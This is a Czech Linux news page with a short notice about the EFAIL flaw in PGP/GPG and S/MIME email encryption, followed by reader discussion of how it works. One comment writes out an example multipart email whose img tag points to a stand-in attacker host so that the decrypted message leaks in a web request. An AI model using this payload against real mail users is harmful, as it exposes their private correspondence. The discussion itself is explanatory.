abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
dnes 21:33 | Zajímavý projekt

Zdrojové kódy operačního systému RISC OS pro architekturu ARM byly již dříve s omezeními zveřejňovány na RISC OS Open. Nyní bylo oznámeno, že RISC OS přejde kompletně pod licenci Apache 2.0.

Fluttershy, yay! | Komentářů: 1
dnes 16:00 | Nová verze

Byl vydán Mozilla Firefox 63.0. Přehled novinek v poznámkách k vydání a na stránce věnované vývojářům. Vylepšeno bylo například blokování obsahu a ochrana proti sledování. Rozšíření ve Firefoxu na Linuxu běží nově v samostatném procesu.

Ladislav Hagara | Komentářů: 1
dnes 11:00 | Humor

Před týdnem byly zveřejněny informace o bezpečnostní chybě CVE-2018-10933 v knihovně libssh implementující protokol SSH. Autentizaci bylo možné jednoduše obejít odesláním zprávy SSH2_MSG_USERAUTH_SUCCESS. Chyba byla opravena v upstream verzích libssh 0.8.4 a 0.7.6. Chris Lamb, vedoucí projektu Debian, zveřejnil na Twitteru upravený komiks Cyanide & Happiness věnovaný této bezpečnostní chybě.

Ladislav Hagara | Komentářů: 1
dnes 10:22 | Komunita

Mozilla na svém blogu Future Releases oznámila spolupráci se švýcarskou společností Proton Technologies stojící za šifrovanou poštou ProtonMail a virtuální privátní sítí ProtonVPN. Právě službu ProtonVPN v ceně 10 dolarů měsíčně začne Mozilla od zítra postupně nabízet uživatelům Firefoxu v USA. Část peněz bude použita na další rozvoj Firefoxu.

Ladislav Hagara | Komentářů: 1
dnes 00:22 | Nová verze

Byla vydána verze 11.4 open source alternativy GitHubu, tj. softwarového nástroje s webovým rozhraním umožňujícího spolupráci na zdrojových kódech, GitLab (Wikipedie). Představení nových vlastností i s náhledy v příspěvku na blogu.

Ladislav Hagara | Komentářů: 1
dnes 00:11 | Zajímavý článek

Jiří Eischmann se v příspěvku Datovka na Flathubu na svém blogu věnuje aplikaci Datovka, tj. multiplatformní desktopové aplikaci pro přístup k datovým schránkám a k trvalému uchovávání datových zpráv v lokální databázi, ve formátu Flatpak. Instalovat ji lze přímo z Flathubu.

Ladislav Hagara | Komentářů: 0
včera 22:55 | Komunita

Richard Stallman představil první verzi dokumentu s názvem GNU Kind Communication Guidelines s doporučeními pro přispěvatele do projektu GNU. Cílem doporučení je udržovat v komunitě přátelskou atmosféru.

Ladislav Hagara | Komentářů: 6
včera 22:22 | Nová verze

Byl vydán Linux 4.19. Jeho vývoj dokončil a vydání oficiálně oznámil Greg Kroah-Hartman, poněvadž si Linus Torvalds vzal před pěti týdny volno a rozhodl se zapracovat na svém chování. Ke kontroverznímu dokumentu Contributor Covenant Code of Conduct přibyla jeho interpretace Linux Kernel Contributor Covenant Code of Conduct Interpretation. Přehled nových vlastností a vylepšení Linuxu 4.19 na stránce Linux Kernel Newbies a samozřejmě v Jaderných novinách. Kódové jméno Linuxu bylo změněno z Merciless Moray na People's Front.

Ladislav Hagara | Komentářů: 5
včera 02:00 | Pozvánky

Konference OpenAlt 2018 (dříve LinuxAlt a Openmobility) proběhne již o víkendu 3. a 4. listopadu na FIT VUT v Brně. Motto konference je "Otevřeným přístupem k otevřené společnosti". Připraveno je 8 tracků přednášek a workshopů. Pořadatelé připravili výběr toho nejzajímavějšího.

Ladislav Hagara | Komentářů: 0
21.10. 01:00 | IT novinky

Bylo vydáno RFC 8484 řešící posílání DNS dotazů a získávání DNS odpovědí přes protokol HTTPS (DoH, DNS over HTTPS). V aktuálních verzích Firefoxu je DoH ve výchozím nastavení zakázáno. Povolit jej lze v about:config změnou hodnoty network.trr.mode (Trusted Recursive Resolver). V srpnu zveřejnila Mozilla výsledky experimentu s DNS přes HTTPS ve Firefoxu Nightly.

Ladislav Hagara | Komentářů: 50
Přispíváte osobně k vývoji svobodného softwaru?
 (39%)
 (42%)
 (24%)
 (23%)
 (12%)
 (36%)
Celkem 290 hlasů
 Komentářů: 17, poslední včera 22:11
Rozcestník

Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

Zítra v 9:00 budou zveřejněny informace o "vážné bezpečnostní chybě" v šifrování pošty pomocí PGP/GPG i S/MIME. EFF (Electronic Frontier Foundation) na svém blogu doporučuje okamžité zakázání automatického dešifrování zpráv nebo raději i odinstalování nástrojů pro dešifrování. Werner Koch, hlavní vývojář GnuPG, i další odborníci považují zprávu za nafouklou bublinu.

14.5. 11:22 | Ladislav Hagara | Bezpečnostní upozornění


Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

Komentáře

Vložit další komentář

Slavko avatar 14.5. 11:46 Slavko
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Hmm, že by boli CIA, NSA a podobné dobré troj-písmenkové organizácie vážne znepokojené narastajúcim počtom šifrovaných správ?
Conscript89 avatar 14.5. 12:07 Conscript89 | Brno
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Stejne jako treba FSB, ze? :)
I can only show you the door. You're the one that has to walk through it.
Conscript89 avatar 14.5. 12:13 Conscript89 | Brno
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Akorat co se tyka v tomto pripade je to co se tyce NSA, CIA spekulace, narozdil od FSB ktera dala primo "pokyn" zakazat telegram.
I can only show you the door. You're the one that has to walk through it.
Slavko avatar 14.5. 15:56 Slavko
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Síce neviem o tom, že by bol akýsi Telegram zakázaný v SR či ČR, ani že by FSB odporúčala okamžite prestať šifrovať, ale inak áno - je to špekulácia, lebo dobré troj-písmenkové organizácie nemajú odvahu urobiť to otvorene, ale získavajú prístup cez nastrčené organizácie, ako napr. súkromné kľúče prostredníctvom metrík Windows...

Mimochodom, i dobré troj-písmenkové organizácie z USA majú podobný prístup zabezpečený ich federálnym zákonom, ale o tom sa taktne mlčí, pretože mlčanie nie je dezinformácia, že... Alebo ste nečítali veci, ktoré vyšli najavo vďaka zlému Snowdenovi?
14.5. 21:12 Peter Golis | skóre: 57 | Bratislava
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
To je ten komunista?
Jendа avatar 14.5. 17:43 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Kdyby tohle objevila NSA, tak si to schová jako 0day a nebude to zveřejňovat.
Marián Kyral avatar 15.5. 10:58 Marián Kyral | skóre: 29 | blog: Sem_Tam | Frýdek-Místek
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
A myslíš, že o tom ještě neví?
14.5. 12:08 elenril
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Aha, takže v podstatě je to jen "HTML email je zlo a neměl by se používat", ale "security researchers" kolem toho potřebují udělat cirkus.
14.5. 14:20 Lyco | skóre: 12 | blog: Lyco
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Protože už jsou k dispozici informace, tak přidávám shrnutí:

Je to kombinace několika věcí:
  1. mailové čtečky stahují automaticky vzdálený obsah
  2. některé mailové čtečky neberou ohled na bezpečnostní interakce zašifrovaného a nezašifrovaného obsahu: můžu v plaintextu otevřít tag img, do src vložit zašifrovaný obsah (pomocí MIME multipart) a v plaintextu zase img zavřít. Voila: v logu webserveru najdu rozšifrovaný obsah.
  3. I pokud je klient rozumný, dá se udělat útok na kryptografii: používá se neautentizovaný mód CBC (nebo jeho dvojče, CFB). Útočník, pokud správně uhodne plaintext prvního bloku (a to typicky dokáže), může zkonstruovat blok který se rozšifruje na známou hodnotu. Tím vloží do plaintextu tag img a zbytek nechá normálně rozšifrovat jako výše.
Vysvětlení Odborný článek
Příspěvek se rázem stává až o 37,5 % pravdivější, je-li pod ním napsáno reálné jméno.
Jendа avatar 14.5. 17:42 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
TL;DR. ELI5: Vyrobíš multipart zprávu s
<img src="https://útočník/?m=
----BOUNDARY
-----BEGIN PGP MESSAGE-----
...
-----END PGP MESSAGE-----
----BOUNDARY
">
Poštovní klient ten vnitřek rozšifruje, sestaví z toho dokument, a pokud povolíš nahrávání vzdálených obrázků (což lze zařídit třeba tím, že tuhle věc přilepíš do newsletteru z Alzy), tak se GETne ten tajný obsah. Nejspíš to selže pokud v šifrované zprávě budou uvozovky.
14.5. 20:20 pc2005 | skóre: 36 | blog: GardenOfEdenConfiguration | liberec
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Poštovní klient ten vnitřek rozšifruje
Tak to je facepalm.
Jendа avatar 14.5. 21:42 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Myslíš tím že by klient neměl rozšifrovat zprávu když je jenom částečně šifrovaná? Často totiž nemáš jinou možnost - například různé mailing listy, které přidávají patičky.
15.5. 09:54 pc2005 | skóre: 36 | blog: GardenOfEdenConfiguration | liberec
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
No dovedu si představit, že by přesunul ten šifrovanej obsah do speciální oblasti a izoloval jí od okolí.
Josef Kufner avatar 15.5. 10:01 Josef Kufner | skóre: 68
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
V první řadě je prasárna cpát šifrovaný text do plain-text těla mailu. Pokud se dá do samostatné multipart části, tak konference patičku přihodí jako další textovou část a nic se nerozbije (přijde multipart zpráva s dvěma těly - jedno šifrované a druhé nikoliv).
Hello world ! Segmentation fault (core dumped)
15.5. 12:56 Lyco | skóre: 12 | blog: Lyco
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Ta chyba je na efail.de popsaná právě pro multipart maily.

Skutečný problém je v tom, že to klient spojí a interpretuje jako celek, přestože jsou tam hranice (dané šifrováním) které nelze bezpečně překročit.
Příspěvek se rázem stává až o 37,5 % pravdivější, je-li pod ním napsáno reálné jméno.
14.5. 17:53 petr
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
at nemusite cekat https://efail.de/efail-attack-paper.pdf

Založit nové vláknoNahoru


ISSN 1214-1267   www.czech-server.cz
© 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.